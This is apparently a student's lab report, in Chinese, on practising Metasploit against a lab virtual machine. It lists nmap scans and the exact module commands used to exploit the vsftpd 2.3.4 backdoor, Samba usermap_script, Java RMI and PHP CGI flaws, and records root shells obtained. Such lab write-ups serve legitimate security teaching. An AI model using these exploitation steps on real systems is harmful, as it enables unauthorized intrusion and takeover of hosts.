1.实验内容
本实践目标是掌握metasploit的用法。要对主机进行前期渗透、Vsftpd源码包后门漏洞(21端口)、SambaMS-RPC Shell命令注入漏洞(端口139)、Java RMI SERVER命令执行漏洞(1099端口)以及PHP CGI参数执行注入漏洞(80端口)处理。
2实验步骤
2.1 前期渗透
输入账号密码相同的msfadmin登录靶机,在靶机中输入ifconfig查看IP地址用于后续扫描,其IP地址为192.168.175.146

在Kali虚拟机中切换到root用户下(如果不是),进入msfconsole,执行ARP扫描,具体命令如下:
点击查看代码
search arp_sweep
use 0
set RHOSTS 192.168.175.146
run

从图中可见靶机 192.168.175.146 当前网络状态正常,处于在线且可被 ARP 探测到的状态,识别出的设备类型是VMware, Inc.(说明这是一台 VMware 虚拟机)
2.2 端口扫描
使用nmap进行端口扫描:执行命令nmap -sS -sV 192.168.175.146进行SYN扫描并进行版本探测,发现靶机开放大量端口且存在多个漏洞。

进入msfconsole,用以下命令同样能扫描到靶机开放的端口。
点击查看代码
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.175.146
set THREADS 10
run

2.3 漏洞扫描
执行命令nmap -script=vuln 192.168.175.146对靶机进行漏洞扫描,发现多个端口存在高危漏洞.
21端口(FTP):vsFTPd 2.3.4后门漏洞(CVE-2011-2523),已验证可执行id命令获取root权限(uid=0 gid=0),是最易利用的漏洞。
25端口 对应 Postfix smtpd 服务,扫描结果显示其存在多个 SSL/TLS 相关高危漏洞,可能被数据泄露、会话劫持。


80端口(HTTP):存在SQL注入、跨站请求伪造(CSRF)、Slowloris DoS漏洞,且暴露了phpMyAdmin、Tikiwiki等管理后台,风险极高。太长就不截图全了。

1099端口(RMI):RMI注册表默认配置漏洞,支持远程加载恶意类,可直接执行代码。
5432端口(PostgreSQL):存在POODLE漏洞(CVE-2014-3566)、CCS注入漏洞(CVE-2014-0224),可解密数据库通信数据。

6667端口(IRC):UnrealIRCd后门,攻击者可直接获取系统权限,无需复杂操作。
8180端口(未知):同样存在Slowloris DoS漏洞,且多个管理页面的JSESSIONID未设置 httponly flag,易遭 Cookie劫持。

2.4 Vsftpd源码包后门漏洞(21端口)
打开msfconsole,用以下命令利用该漏洞
点击查看代码
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.175.146
run

2.5 Samba MS-RPC Shell命令注入漏洞(139端口)
执行命令nmap -p 139 192.168.175.146,确认139端口开放。

利用Metasploit框架的Samba服务usermap_script漏洞,具体命令如下:
点击查看代码
use exploit/multi/samba/usermap_script
set RHOST 192.168.175.146
run
漏洞利用成功后获得靶机shell,可查看当前路径、目录文件,确认当前用户为root用户

2.6 Java RMI SERVER命令执行漏洞(1099端口)
由前文得知此端口必定开放,利用Metasploit框架利用该漏洞,具体命令如下
点击查看代码
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.175.146
run
漏洞利用成功后获得Meterpreter会话,输入shell切换到交互式Shell,可查看靶机完整系统信息、当前路径及目录文件,确认当前用户为root用户.

2.7 PHP CGI参数执行注入漏洞(80端口)
由前文得知此端口必定开放,利用Metasploit框架利用该漏洞,具体命令如下
点击查看代码
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.175.146
run
漏洞利用成功后获得Meterpreter会话,输入shell切换到交互式Shell,可查看靶机完整系统信息、当前路径及目录文件,确认当前用户为root用户。

3问题及解决
无,这次实验很简单,把代码一一代入即可解决。
4心得体会
这次实验metasploit、nmap用的比较多,感觉用的更熟练了,并且比前几次实验简单,且没有出现什么问题,这很令我惊喜。